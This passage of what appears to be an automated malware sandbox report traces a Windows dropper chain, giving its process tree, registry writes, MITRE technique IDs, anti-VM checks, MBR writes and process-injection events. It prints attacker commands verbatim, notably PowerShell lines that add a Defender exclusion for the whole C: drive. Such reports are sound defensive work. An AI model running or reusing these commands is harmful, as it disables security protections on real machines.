0f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff10300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd17e00000001000000080000000080c82b6886d7017a000000010000000c000000300a06082b060105050703091d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a07f0000000100000016000000301406082b0601050507030306082b060105050703096200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf690b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520036000000090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410	pcidrv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E	pcidrv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703082000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd	pcidrv.exe
Key created	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Microsoft\SystemCertificates\CA\Certificates\CBFE9EB43B3B37FE0DFBC4C2EB2D4E07D08BD8E8	pcidrv.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Microsoft\SystemCertificates\CA\Certificates\CBFE9EB43B3B37FE0DFBC4C2EB2D4E07D08BD8E8\Blob = 030000000100000014000000cbfe9eb43b3b37fe0dfbc4c2eb2d4e07d08bd8e81400000001000000140000000cdb6c82490f4a670ab814ee7ac4485288eb563804000000010000001000000098eb0b62c3fe53eac8caa8fdb58020ee0f0000000100000020000000b4e0a8c98b0aae43b7383037accd11a1c964971f6b74fcbc370cd030fb328ddd19000000010000001000000058f4c3aea49be319eaff0e54cef46cd35c00000001000000040000000008000018000000010000001000000014c3bd3549ee225aece13734ad8ca0b84b0000000100000044000000450032004300360043004200410046003000410046003000380043004600320030003300420041003700340042004600300044003000410042003600440035005f0000002000000001000000b7040000308204b33082039ba00302010202100b259422ced9812a15a04e99528a0efa300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3137313130323132323433335a170d3237313130323132323433335a3060310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d311f301d06035504031316526170696453534c20544c532052534120434120473130820122300d06092a864886f70d01010105000382010f003082010a0282010100bfb9592544123516e25d5049050ae0cbfc8dda25089a67a6a26d11e36a9fdaa7dcf2d5a60dae985eed871a3703283ec66f5c347e84d24ea3d81b80e6154cfabc81773ce08ef960a38789503836b249419ea9dac250caac7ad07904223cc837ed4b40b7d74e5a6ece74e839ad61c930f4cb28ad172398c1444cfbf088f05345329061c36da1a5e01090e38b9aca93e5064961e8a4eea96f9fc81f0fe5dd0e7937924baebb4786fafbb2ad21abe6e5f92d18455a5bf5cc5403721fc42a6775eb79bacffc9cc7fa8b6bdcf2bc82dcedc4296fe93b4cbadaf56135ed83d29fd00d8c6f840a8f4f0d6dcdf65c2129008dbf0d601a882ec8242eec713b0675bc7924850203010001a382016630820162301d0603551d0e041604140cdb6c82490f4a670ab814ee7ac4485288eb5638301f0603551d230418301680144e2254201895e6e36ee60ffafab912ed06178f39300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d30420603551d1f043b30393037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7447322e63726c30630603551d20045c305a303706096086480186fd6c0101302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f435053300b06096086480186fd6c01023008060667810c0102013008060667810c010202300d06092a864886f70d01010b050003820101001944a539be0add6b664a56e6139d146011d733448a5cfa8733393a5d05290a1785ff8a94f1a3a16a3b324501435758a1fee3c883b60746d162093ab81becdbe375f54fbee726048e23da6afd3a82c2dba467bbbd54b2f7240ab759dcb69a828bbef0bcb55991ce401ed314029112888db046f34312c835ff478b98823e9988d4ff660e8623a4687e0aa0a4376cb0b7345c8450128b7121970accfde9189f4509b30798c2cbcae05dfae096bd5705da881801ac2e7c2852fcf4fad43f6bab33d14b9236baa6b7b66213e382612605a106714c6fb006424bcdabd28d4bd75ddc659cd7b1ff7576b57a7a31cd68c4d2105d163c4f8546f45b7c22f28df8fe6f05c7	pcidrv.exe
Key created	\REGISTRY\USER\S-1-5-21-3712238951-2226310826-298817577-1000\Software\Microsoft\SystemCertificates\CA\Certificates\00ABEFD055F9A9C784FFDEABD1DCDD8FED741436	pcidrv.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
9036	PING.EXE
9160	PING.EXE
8564	PING.EXE
8780	PING.EXE
8864	PING.EXE
8988	PING.EXE
9096	PING.EXE
8960	PING.EXE
8920	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
9640	schtasks.exe
9744	schtasks.exe
17476	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
10644	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2620	1P22P6.exe
2620	1P22P6.exe
2240	rapes.exe
2240	rapes.exe
4384	2i0393.exe
4384	2i0393.exe
4384	2i0393.exe
4384	2i0393.exe
4384	2i0393.exe
4384	2i0393.exe
492	MSBuild.exe
492	MSBuild.exe
492	MSBuild.exe
492	MSBuild.exe
2860	powershell.exe
2860	powershell.exe
1224	MSBuild.exe
1224	MSBuild.exe
1224	MSBuild.exe
1224	MSBuild.exe
2772	svchost.exe
2772	svchost.exe
2772	svchost.exe
2772	svchost.exe
2176	712b652cf6.exe
2176	712b652cf6.exe
14544	powershell.exe
14544	powershell.exe
2176	712b652cf6.exe
2176	712b652cf6.exe
2176	712b652cf6.exe
2176	712b652cf6.exe
15060	rapes.exe
15060	rapes.exe
15024	Rm3cVPI.exe
15024	Rm3cVPI.exe
15024	Rm3cVPI.exe
15024	Rm3cVPI.exe
15320	powershell.exe
15320	powershell.exe
7152	rapes.exe
7152	rapes.exe
788	ff15d61e9f.exe
788	ff15d61e9f.exe
788	ff15d61e9f.exe
788	ff15d61e9f.exe
788	ff15d61e9f.exe
788	ff15d61e9f.exe
7632	9sWdA2p.exe
7632	9sWdA2p.exe
7632	9sWdA2p.exe
7632	9sWdA2p.exe
7632	9sWdA2p.exe
7632	9sWdA2p.exe
9368	but2.exe
9368	but2.exe
14916	Jordan.com
14916	Jordan.com
14916	Jordan.com
14916	Jordan.com
14916	Jordan.com
14916	Jordan.com
9348	rapes.exe
9348	rapes.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
1112	tzutil.exe
5948	d59464fb.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5160	UZPt0hR.exe
5160	UZPt0hR.exe
5160	UZPt0hR.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
9564	chrome.exe
9564	chrome.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	14544	powershell.exe
Token: SeLoadDriverPrivilege	1112	tzutil.exe
Token: SeDebugPrivilege	15320	powershell.exe
Token: SeDebugPrivilege	5948	d59464fb.exe
Token: SeBackupPrivilege	5948	d59464fb.exe
Token: SeRestorePrivilege	5948	d59464fb.exe
Token: SeLoadDriverPrivilege	5948	d59464fb.exe
Token: SeShutdownPrivilege	5948	d59464fb.exe
Token: SeSystemEnvironmentPrivilege	5948	d59464fb.exe
Token: SeSecurityPrivilege	5948	d59464fb.exe
Token: SeDebugPrivilege	12780	tasklist.exe
Token: SeDebugPrivilege	13668	tasklist.exe
Token: SeDebugPrivilege	9500	RYZusWg.exe
Token: SeDebugPrivilege	11576	powershell.exe
Token: SeDebugPrivilege	10644	powershell.exe
Token: SeDebugPrivilege	11780	powershell.exe
Token: SeShutdownPrivilege	9564	chrome.exe
Token: SeCreatePagefilePrivilege	9564	chrome.exe

Suspicious use of FindShellTrayWindow 30 IoCs

pid	Process
2620	1P22P6.exe
14916	Jordan.com
14916	Jordan.com
14916	Jordan.com
9116	amnew.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe
9564	chrome.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
14916	Jordan.com
14916	Jordan.com
14916	Jordan.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3328 wrote to memory of 3472	3328	random.exe	84
PID 3328 wrote to memory of 3472	3328	random.exe	84
PID 3328 wrote to memory of 3472	3328	random.exe	84
PID 5664 wrote to memory of 1956	5664	cmd.exe	85
PID 5664 wrote to memory of 1956	5664	cmd.exe	85
PID 3472 wrote to memory of 2620	3472	x2T29.exe	87
PID 3472 wrote to memory of 2620	3472	x2T29.exe	87
PID 3472 wrote to memory of 2620	3472	x2T29.exe	87
PID 4104 wrote to memory of 4804	4104	cmd.exe	89
PID 4104 wrote to memory of 4804	4104	cmd.exe	89
PID 2620 wrote to memory of 2240	2620	1P22P6.exe	91
PID 2620 wrote to memory of 2240	2620	1P22P6.exe	91
PID 2620 wrote to memory of 2240	2620	1P22P6.exe	91
PID 3472 wrote to memory of 4384	3472	x2T29.exe	92
PID 3472 wrote to memory of 4384	3472	x2T29.exe	92
PID 3472 wrote to memory of 4384	3472	x2T29.exe	92
PID 2240 wrote to memory of 1632	2240	rapes.exe	95
PID 2240 wrote to memory of 1632	2240	rapes.exe	95
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 1632 wrote to memory of 492	1632	d69de35f48.exe	96
PID 2240 wrote to memory of 5160	2240	rapes.exe	97
PID 2240 wrote to memory of 5160	2240	rapes.exe	97
PID 2240 wrote to memory of 5160	2240	rapes.exe	97
PID 5160 wrote to memory of 3940	5160	UZPt0hR.exe	98
PID 5160 wrote to memory of 3940	5160	UZPt0hR.exe	98
PID 5160 wrote to memory of 1328	5160	UZPt0hR.exe	100
PID 5160 wrote to memory of 1328	5160	UZPt0hR.exe	100
PID 3940 wrote to memory of 2860	3940	cmd.exe	105
PID 3940 wrote to memory of 2860	3940	cmd.exe	105
PID 2240 wrote to memory of 4144	2240	rapes.exe	106
PID 2240 wrote to memory of 4144	2240	rapes.exe	106
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 4144 wrote to memory of 1224	4144	TbV75ZR.exe	107
PID 1224 wrote to memory of 2772	1224	MSBuild.exe	108
PID 1224 wrote to memory of 2772	1224	MSBuild.exe	108
PID 1224 wrote to memory of 2772	1224	MSBuild.exe	108
PID 1224 wrote to memory of 2772	1224	MSBuild.exe	108
PID 1224 wrote to memory of 2772	1224	MSBuild.exe	108
PID 2240 wrote to memory of 2176	2240	rapes.exe	112
PID 2240 wrote to memory of 2176	2240	rapes.exe	112
PID 2240 wrote to memory of 2176	2240	rapes.exe	112
PID 1328 wrote to memory of 1112	1328	svchost.exe	113
PID 1328 wrote to memory of 1112	1328	svchost.exe	113
PID 1328 wrote to memory of 428	1328	svchost.exe	114
PID 1328 wrote to memory of 428	1328	svchost.exe	114
PID 1112 wrote to memory of 14544	1112	tzutil.exe	115
PID 1112 wrote to memory of 14544	1112	tzutil.exe	115
PID 2240 wrote to memory of 15024	2240	rapes.exe	117
PID 2240 wrote to memory of 15024	2240	rapes.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2828
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2772

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3328
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x2T29.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x2T29.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3472
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P22P6.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P22P6.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2240
    - - C:\Users\Admin\AppData\Local\Temp\10003000101\d69de35f48.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10003000101\d69de35f48.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1632
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:492
    - - C:\Users\Admin\AppData\Local\Temp\10337510101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337510101\UZPt0hR.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:5160
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2860
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        Downloads MZ/PE file
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:1328
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:14544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:15320
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        7⤵
        Deletes itself
        Executes dropped EXE
        
        PID:428
        
        C:\Users\Admin\AppData\Local\Temp\{1d236544-1eb1-4242-b40f-3707c5e67854}\485a3f32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{1d236544-1eb1-4242-b40f-3707c5e67854}\485a3f32.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:7680
        
        C:\Users\Admin\AppData\Local\Temp\{999e0227-138a-49b0-a923-8d840a228077}\d59464fb.exe
        
        C:/Users/Admin/AppData/Local/Temp/{999e0227-138a-49b0-a923-8d840a228077}/\d59464fb.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{2fc3435b-4506-4aed-8d41-c2cddb9fb5c2}\df8eb9d6-05ad-4bcb-8947-423be52337e1.cmd" "
        10⤵
        
        PID:8656
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8864
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8960
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v df8eb9d6-05ad-4bcb-8947-423be52337e1 /f
        11⤵
        Modifies registry key
        
        PID:9208
    - - C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4144
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1224
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 532
        7⤵
        Program crash
        
        PID:4892
    - - C:\Users\Admin\AppData\Local\Temp\10340260101\712b652cf6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340260101\712b652cf6.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2176
    - - C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:15024
    - - C:\Users\Admin\AppData\Local\Temp\10380550101\ff15d61e9f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10380550101\ff15d61e9f.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
